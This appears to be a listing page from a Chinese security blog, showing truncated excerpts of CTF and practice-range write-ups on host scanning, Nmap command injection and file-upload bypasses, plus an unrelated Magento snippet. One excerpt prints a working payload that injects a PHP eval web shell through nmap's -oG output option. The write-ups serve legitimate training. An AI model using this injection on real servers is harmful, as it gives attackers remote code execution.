- 2024-07-12Hacknos-Player V1.1打靶渗透【附POC】
1.信息收集:1.1.主机扫描nmap-sn'192.168.7.0/24'|grep-B2'08:00:27:C9:02:09'1.2.端口扫描80、3306nmap-p-192.168.7.991.3.目录扫描dirsearch-u192.168.7.991.4.操作系统等敏感信息查看2.漏洞扫描+漏洞利用2.1.老规矩,进入主页点击可能存在
- 2024-04-10[网鼎杯 2020 朱雀组]Nmap
[网鼎杯2020朱雀组]Nmap类似Nmap的功能,一个输入命令行,提示输入ip地址,尝试输入正常内容:127.0.0.1nmap命令将扫描结果保存在文件里面:例如:将nmap127.0.0.1的结果保存在test.txt里面nmap127.0.0.1-oNtest.txtnmap其他写文件命令:-oN(标准输出)-oX(XML输出)-oS(ScR
- 2023-09-06Upload靶场通关笔记-特殊解析后缀
特殊解析后缀 提 示本pass禁止上传.asp|.aspx|.php|.jsp后缀文件! //后缀黑名单//t用于删除字符串的头尾空白符,空白符包括:空格、制表符tab、换行符等其他空白符等。//函数用于查找某字符在字符串中最后一次出现的位置将最后一个点前面的内容全部删掉 php
- 2023-09-04BUUCTF [网鼎杯 2020 朱雀组]Nmap
payload:127.0.0.1|'<?=@eval($_POST["hack"]);?>-oGhack.phtml'nmap`-oG`:将扫描结果输出到一个文本文件中,G代表生成一种称为"grepableoutput"(可用于grep命令的输出)的格式,这种格式是一种易于处理的文本格式。写入`hack.phtml`而不是`hack.php`的原因在于php可能被过
- 2023-04-03magento 高级搜索 brand实例 Magento ‘Shop By Brand’ in SideBar
高级搜索地址一般为:/catalogsearch/advanced/ Firstcreatethetemplatefileandnameitproductbrand.phtmlplaceitincatalog/productfoldercopythecodegivenbelowandpasteritinyouproductbrand.phtml Note:Pleasechnage‘yourdomain.com’withyoursit
- 2022-12-11[BUUCtF][WEB][ACTF2020 新生赛]Upload 1
打开靶机url,右键查看网页源代码其中有一段代码<divclass="light"><spanclass="glow"> <formenctype="multipart/form-data"method="post"onsubmit="returncheck
- 2022-12-11[BUUCTF][WEB][极客大挑战 2019]Upload 1
打开靶机url,看到一个页面可以上传文件上传一个图片试一下,发现上传的路径是http://a7661b03-4852-41de-9ea4-d48c47cb50f0.node4.buuoj.cn:81/upload_file.php试一下获